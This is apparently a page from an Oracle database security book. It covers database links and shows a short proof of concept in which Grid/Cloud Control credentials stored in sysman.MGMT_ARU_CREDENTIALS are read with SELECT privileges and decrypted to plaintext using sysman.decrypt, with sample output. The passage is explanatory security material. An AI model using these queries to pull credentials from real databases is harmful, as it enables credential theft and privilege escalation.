Database Reference
In-Depth Information
CREATE DATABASE LINK hrvwlink CONNECT TO HR IDENTIFIED BY secure_password USING 'tnsentryx';
CREATE VIEW HR.EMP_VIEW as SELECT * FROM HR.EMPLOYEES@hrvwlink;
GRANT select, insert, update, delete on HR.EMP_VIEW to HR_ADMIN;
GRANT select on HR.EMP_VIEW to HR_VIEWER;
select employee_id, salary from employees@hrvwlink
where employee_id = 206;
UPDATE HR.EMP_VIEW SET SALARY = 10000
WHERE employee_id = 206;
Database link passwords will normally be gained post-exploitation, i.e., after a user has escalated their privileges
from a lower-privileged user such as DBSNMP , used for Enterprise Manager and cloud control.
Enterprise Manager and Cloud Control Security
Control and security of the DBSNMP credential is part of Cloud Control, previously known as Grid Control, basically
consisting of an Enterprise Manager web interface that connects to a separate repository DB, which holds metadata
about the whole estate, including the passwords for each database. These passwords have to be stored in the
repository and then decrypted by the cloud control software in order to monitor each target database. In 11g the
SYSMAN password can be decrypted just with SELECT privileges, as this following proof of concept (PoC) shows. This
is how grid control sets a user's username and password in the DB, under the hood.
exec sysman.MGMT_CREDENTIAL.SET_ARU_CREDENTIALS('test@myemail.com','insecure_password');
What follows are those preceding credentials encrypted as they would appear to a DB user with just SELECT ANY
TABLE privilege or equivalent.
SQL> select * from sysman.MGMT_ARU_CREDENTIALS;
ARU_USERNAME
--------------------------------------------------------------------------------
ARU_PASSWORD
--------------------------------------------------------------------------------
C74AD2422A26F1AB3A0FB04C7770C9B123675B65C9695D9F
157781F0E20C9A687EE4E2B7A649346279D11B98FA3DC31F
The following example shows how easy it is to select out the plaintext of usernames and passwords from grid
control, if one has execute on the sysman.decrypt function.
SQL> select sysman.decrypt(ARU_USERNAME), sysman.decrypt(ARU_PASSWORD) from
sysman.MGMT_ARU_CREDENTIALS;
SYSMAN.DECRYPT(ARU_USERNAME)
--------------------------------------------------------------------------------
SYSMAN.DECRYPT(ARU_PASSWORD)
--------------------------------------------------------------------------------
test@myemail.com
insecure_password
 
Search WWH ::




Custom Search